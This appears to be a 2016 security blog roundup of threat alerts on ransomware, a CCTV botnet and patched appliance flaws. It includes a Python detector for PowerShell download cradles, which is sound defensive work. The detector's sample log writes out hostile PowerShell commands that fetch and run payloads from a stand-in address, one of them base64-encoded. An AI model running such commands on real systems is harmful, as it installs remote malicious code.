Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On June 29, 2016

June 28, Softpedia – (International) Microsoft Office 365 corporate users hit by Cerber ransomware attack. Avanan researchers reported that about 57 percent of all companies using Microsoft Office 365 received at least one copy of the Cerber ransomware in their inboxes during a June 22 attack that lasted 5 hours before Microsoft blocked the malicious file attachments. Source

June 27, SecurityWeek – (International) MIRCOP ransomware claims to be victim, demands payback. Trend Micro researchers reported that the MIRCOP ransomware abuses Microsoft PowerShell to download and execute its malicious payload, and that its ransom note accuses the victim of having stolen 48.48 Bitcoins, implying that the victim already knows how to return the money. MIRCOP prepends the string “Lock” to the names of the files it encrypts and can steal credentials from various applications including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype. Source
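The PowerShell download-and-execute behaviour in the MIRCOP item is something a SOC can hunt for in process-creation logs. The following is an added example (not code from this page, Trend Micro or SecurityWeek) of a generic "download cradle" detector: it extracts the command line from each log line, decodes any -EncodedCommand blob (base64 of the UTF-16LE script), and only alerts when both a network fetch and an execution primitive are present. The indicator list, the key=value log format, the host and user names and the 203.0.113.10 address are all constructed for illustration; the page does not reproduce MIRCOP's actual command lines.

```python
"""Flag PowerShell download-and-execute cradles in process-creation logs.

Added example, not MIRCOP's real command lines (which this page does not give).
The indicator families below are a general heuristic for the behaviour described:
PowerShell fetching a payload over HTTP and running it.
"""
import base64
import re

# Indicator families. A command line counts as a cradle only when it both fetches
# something over the network AND hands the result to an execution primitive.
INDICATORS = {
    "fetch": re.compile(
        r"net\.webclient|download(string|file|data)|invoke-webrequest|\biwr\b|invoke-restmethod",
        re.IGNORECASE),
    "exec": re.compile(r"invoke-expression|\biex\b|start-process|\bsaps\b", re.IGNORECASE),
    "evasion": re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-noni\b|-ep\s+bypass|-executionpolicy\s+bypass",
        re.IGNORECASE),
}

# -EncodedCommand (and its short forms) carries base64 of the UTF-16LE script text.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmdline):
    """Score one process command line: verdict, matched indicator families, decoded script."""
    decoded = decode_encoded_command(cmdline)
    # Scan the raw line plus the decoded script so encoding does not hide the indicators.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    flags = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        flags.append("encoded")
    return {
        "cradle": "fetch" in flags and "exec" in flags,
        "flags": flags,
        "decoded": decoded,
    }


CMDLINE_FIELD = re.compile(r"CommandLine=(.*)$")


def scan_log(lines):
    """Return [(line_number, analysis)] for every log line that looks like a cradle."""
    alerts = []
    for n, line in enumerate(lines, start=1):
        m = CMDLINE_FIELD.search(line)
        if not m:
            continue
        result = analyze_command(m.group(1))
        if result["cradle"]:
            alerts.append((n, result))
    return alerts


# Constructed sample log (process-creation events flattened to key=value form).
# 203.0.113.10 is a documentation-range address, not a real C2 server.
_encoded_script = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
_encoded_blob = base64.b64encode(_encoded_script.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    # benign admin use of -NoProfile: evasion-ish flag but no fetch/exec
    'host=WS01 user=jdoe CommandLine=powershell.exe -NoProfile -Command "Get-ChildItem C:\\logs | Measure-Object"',
    # cleartext cradle: fetch with DownloadFile, run with Start-Process
    "host=WS02 user=asmith CommandLine=powershell.exe -w hidden -nop -ep bypass -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/x.exe','C:\\Users\\Public\\x.exe'); Start-Process 'C:\\Users\\Public\\x.exe'\"",
    # same behaviour hidden behind -Enc; only visible after decoding
    "host=WS03 user=bkim CommandLine=powershell.exe -NoP -NonI -W Hidden -Enc " + _encoded_blob,
]

if __name__ == "__main__":
    for n, result in scan_log(SAMPLE_LOG):
        print(f"line {n}: flags={result['flags']}")
        if result["decoded"]:
            print(f"  decoded: {result['decoded']}")
```

Requiring both a fetch and an execution indicator keeps ordinary `-NoProfile` automation out of the alert queue, while decoding `-EncodedCommand` before matching is what catches the third line; without it the base64 blob matches nothing.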

June 28, Help Net Security – (International) 25,000-strong CCTV botnet used for crippling DDoS attacks. Sucuri researchers discovered that a closed circuit television (CCTV) botnet comprised of 25,000 cameras worldwide was carrying out distributed denial-of-service (DDoS) attacks against a jewelry store Web site and found that the compromised cameras were able to emulate normal behavior of popular browsers in order to make the botnet more difficult to identify and block. Researchers reported that the attackers could have hacked the devices via a recently disclosed remote code execution (RCE) vulnerability in CCTV-Digital Video Recorders (DVRs). Source

June 28, The Register – (International) Riverbed’s NetProfiler, NetExpress virty appliances patched. Riverbed released an update for two of its virtual appliances, the SteelCentral NetProfiler and NetExpress, patching Structured Query Language (SQL) injection, command injection, privilege escalation, local file inclusion, cross-site scripting (XSS), account hijacking, and hard-coded credential vulnerabilities, which could be chained together to obtain unauthenticated remote code execution (RCE) as the root user. Source

Above Reprinted from the USDHS Daily Open Source Infrastructure Report

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.